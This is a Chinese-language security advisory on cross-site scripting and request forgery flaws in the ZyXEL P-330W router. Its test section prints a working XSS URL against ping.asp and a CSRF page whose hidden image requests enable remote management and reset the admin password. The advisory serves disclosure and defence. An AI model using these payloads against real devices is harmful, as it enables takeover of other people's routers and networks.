ZyXEL P-330W跨站脚本执行及请求伪造漏洞
发布日期:2007-12-25
更新日期:2008-01-03
受影响系统:ZyXEL P-330W
描述:
BUGTRAQ ID:
27024
ZyXEL P-330W是一款无线宽带路由器。
ZyXEL P-330W处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞攻击用户系统。
ZyXEL P-330W的ping.asp文件中没有正确地过滤对pingstr参数的输入便返回给了用户,这允许攻击者通过跨站脚本在用户浏览器会话中执行任意HTML和脚本代码;此外设备还允许用户通过HTTP请求执行各种操作,但没有验证请求的有效性,这可能允许攻击者通过伪造请求执行各种攻击,如更改管理员口令。
<*来源:Santa Clause (
santa_clause@hush.com)
链接:
http://secunia.com/advisories/28172/
http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059295.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://<router_ip>:<router_port>/ping.asp?pingstr=”><script>alert("Merry Christams")</script>
<html><head><title>Chirstmastime is Here</title></head><body>
<img
src="http://<router_ip>:<router_port>/goform/formRmtMgt?webWanAccess
=ON&remoteMgtPort=80
80&pingWANEnabled=&upnpEnabled=&WANPassThru1=&WANPassThru2=&WANPassT
hru3=&
submit-url=%2Fremotemgt.asp" width="0" height="0">
<img
src="http://<router_ip>:<router_port>/goform/formPasswordSetup?usern
ame=admin&newpass=santa_pw
&confpass=santa_pw&submit-url=%2Fstatus.asp&save=Save" width="0"
height="0">
</body>
</html>
建议:
厂商补丁:
ZyXEL
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.zyxel.com/index.php浏览次数:2907
严重程度:0(网友投票)